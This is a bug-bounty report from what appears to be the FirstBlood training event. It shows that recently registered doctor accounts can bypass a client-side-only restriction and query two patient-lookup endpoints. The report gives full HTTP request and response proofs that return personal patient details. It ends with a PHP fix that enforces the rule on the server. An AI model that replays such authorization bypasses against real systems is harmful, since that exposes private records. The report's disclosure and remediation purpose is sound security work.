FirstBlood-#226 Recently registered doctor account can still query /drpanel/drapi/qp.php & /drpanel/drapi/query.php

On 2021-05-13, 0xconft reported:

Hi there,

I found a doctor registration invitation code posted on Reddit, "F16CA47250E445888824A9E63AE445CE" (https://webcache.googleusercontent.com/search?q=cache:fTlNOjiZGM4J:https://www.reddit.com/r/BugBountyHunter/comments/n4xzw1/firstbloodhackerscom_doctor_registration/+&cd=1&hl=id&ct=clnk&gl=id), and I can use it to register a doctor account.

I noticed that on a recently registered doctor account there is a filter that disallows it from viewing patient information, but it only happens on the client side. These accounts can still query the qp.php & query.php endpoints with their drps cookie.

PoC. Cookie drps=14cdcff76e1ed0f28938d98d2 is the cookie of the recently registered doctor account.

Request

GET /drpanel/index.php HTTP/1.1
Host: firstbloodhackers.com:49648
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: drps=14cdcff76e1ed0f28938d98d2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:37:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10463

-snip-
                                        <div class="alert alert-danger" role="alert"> <strong>Warning:</strong> As your account has been recently registered you will not be able to view patient information yet. </div>
-snip-

PoC of qp.php

Request

POST /drpanel/drapi/qp.php HTTP/1.1
Host: firstbloodhackers.com:49648
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://firstbloodhackers.com:49648
Connection: close
Referer: http://firstbloodhackers.com:49648/drpanel/index.php
Cookie: drps=14cdcff76e1ed0f28938d98d2

name=sea

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:39:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 228

Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>

PoC of query.php

Request

GET /drpanel/drapi/query.php?aptid=56910219 HTTP/1.1
Host: firstbloodhackers.com:49648
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://firstbloodhackers.com:49648/drpanel/index.php
Cookie: drps=14cdcff76e1ed0f28938d98d2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:39:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 261

For safeguarding reasons please do not leave this alert on your screen when unattended! Use information below to verify patients over the phone.

Name: John Smith
Address: 1 Quay Point, Station Road, Woodbridge, IP12 4AL
Telephone: 0113 271 2111
DOB: 09/09/1990

Best Regards, 0xconft

P1 CRITICAL

Endpoint: /drpanel/drapi/qp.php & /drpanel/drapi/query.php

Parameter: cookie

Payload: drps cookie of recently registered doctor account


FirstBlood ID: 11
Vulnerability Type: Application/Business Logic

Administrator endpoints can be accessed by non-privileged doctor accounts, which reveals sensitive patient information.
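As an added illustration (not FirstBlood's code), a PHP guard that enforces the "recently registered" rule on the server, at the top of the two drapi endpoints, instead of only in the index.php banner. The session table, cookie values, dates and the 14-day threshold are constructed for the example.

```php
<?php
declare(strict_types=1);

// Constructed in-memory session store standing in for the real drps lookup.
// Cookie values and dates are made up for this example.
const SESSIONS = [
    'drps_example_new' => ['id' => 7, 'role' => 'doctor', 'registered_at' => '2021-05-13'],
    'drps_example_old' => ['id' => 2, 'role' => 'doctor', 'registered_at' => '2019-01-10'],
    'drps_example_adm' => ['id' => 1, 'role' => 'admin',  'registered_at' => '2018-06-01'],
];

const MIN_ACCOUNT_AGE_DAYS = 14; // assumed policy; the report does not state the real value

/**
 * Decide whether the account behind the drps cookie may read patient records.
 * Returns null when allowed, otherwise the HTTP status code to send.
 */
function patient_access_denial(?string $drps, DateTimeImmutable $now): ?int {
    if ($drps === null || !isset(SESSIONS[$drps])) {
        return 401;                 // no valid session at all
    }
    $acct = SESSIONS[$drps];
    if ($acct['role'] === 'admin') {
        return null;                // admins are exempt from the probation rule
    }
    $registered = new DateTimeImmutable($acct['registered_at']);
    if ($registered->diff($now)->days < MIN_ACCOUNT_AGE_DAYS) {
        return 403;                 // the rule the UI banner describes, enforced here
    }
    return null;
}

/** Call this before any database access in qp.php and query.php. */
function require_patient_access(): void {
    $denial = patient_access_denial($_COOKIE['drps'] ?? null, new DateTimeImmutable());
    if ($denial !== null) {
        http_response_code($denial);
        header('Content-Type: text/plain');
        echo $denial === 401 ? 'Not authenticated' : 'Account too new to view patient information';
        exit;
    }
}

// Self-check when run from the CLI (php guard.php): new -> 403, old/admin -> allow, bogus -> 401
if (PHP_SAPI === 'cli') {
    $now = new DateTimeImmutable('2021-05-13 17:39:08');
    $cases = ['drps_example_new' => 403, 'drps_example_old' => null, 'drps_example_adm' => null, 'bogus' => 401];
    foreach ($cases as $cookie => $want) {
        $got = patient_access_denial($cookie, $now);
        printf("%-17s -> %s\n", $cookie, $got ?? 'allow');
        assert($got === $want);
    }
}
```

The rejection has to happen in the endpoint handler itself, since the `/drpanel/index.php` banner in the report is rendered only for browsers and is never consulted by a direct POST to `qp.php`.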


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.